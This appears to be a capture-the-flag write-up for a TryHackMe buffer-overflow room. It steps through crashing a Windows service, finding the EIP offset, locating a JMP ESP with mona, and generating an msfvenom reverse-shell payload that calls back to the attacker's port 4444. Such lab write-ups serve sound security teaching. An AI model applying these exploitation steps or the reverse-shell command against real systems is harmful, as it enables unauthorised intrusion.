Exploit a buffer overflow vulnerability by analyzing a Windows executable.
Perform a quick rustscan to view open ports.
Port our results to nmap.
Not much information but I tried opening them on my browser. Port 9999 gave nothing but 10000 opens up a website as shown below.
I bruteforced for some directories and found something interesting.
This directory contains an executable file which is the application running on port 9999.
Trying a netcat to port 9999. We get this password prompt.
We are working with a buffer overflow, so let us trying crashing the application running on port 9999
We indeed get a crashing confirming existence of a buffer overflow.
Download the executable file and transfer it to your Windows VM. We will work with Immunity debugger.
Run the application and try connecting to it using our VM’s IP.
We can test the connection using netcat. We get the connection back. Everything set up, let’s get hacking :)
Step 1: Finding the size of the crash
We need to find the approximate number of bytes that crashed our application. Attach it to immunity debugger and we can write a python script to send some bytes to the application till it crashes.
Head over to immunity debugger and see that our application crashed
To calculate the size of the crash, right click on esp , follow in dump. Check the address where the As start and end
We get 2072. We will use this as the default length of bytes.
Modify our script as follows.
Step 2: Finding the offset
Next we need to find out the exact number of bytes within the total_length that actually cause the crash. We use msf pattern create and pattern offset.
/usr/bin/msf-pattern_create -l 2072
Copy the result and modify our script as follows
Run the script and note the value of the EIP
/usr/bin/msf-pattern_offset -l 2072 -q 35724134
[*] Exact match at offset 524
We get our offset at 524. This means we have exactly 524 bytes before we reach the EIP register
Step 3: Controlling the EIP
We modify our script as follows and observe the EIP register
We try controlling the EIP with 4Bs and get the ascii value for B as 42424242 on the EIP register.
We have control over the EIP.
Step 4: Finding the bad characters
We need to determine the characters that brainpan does not like. This will help us create our payload without the bad characters.
I like to use the struct inbuilt module with list comprehension. Modify your script as follows and send the bad characters.
We can observe the characters in the hex dump and see if we get any bad ones. Luckily for us there are no bad characters here.
Step 5: Finding a JMP ESP instruction
We need to find a JMP ESP instruction that will take us to the top of the stack. We will use this JMP ESP as the new EIP so that we hijack the control flow of the program.
We can use the mona module
!mona jmp -r esp
We get an address that points to a jmp esp instruction
Set a breakpoint at that instruction. Ctrl+G , enter the address value then press enter and set breakpoint.
Modify our script as follows and observe that we hit the breakpoint,
step through the code using f7 and observe how we get redirected to the top of the stack
Step 6: Generating shellcode
Now we can generate shellcode to get a reverse shell on our program
msfvenom -p windows/shell_reverse_tcp LHOST=wlan0 LPORT=4444 -e x86/shikata_ga_nai -f py -b "\x00"
Modify our script and send the payload while listening on port 4444
Sweet :) Our exploit worked. Now recreate the shellcode but with tun0 for tryhackme local IP. Change the IP in the script to the remote IP
We get a shell :)
Happy hacking :)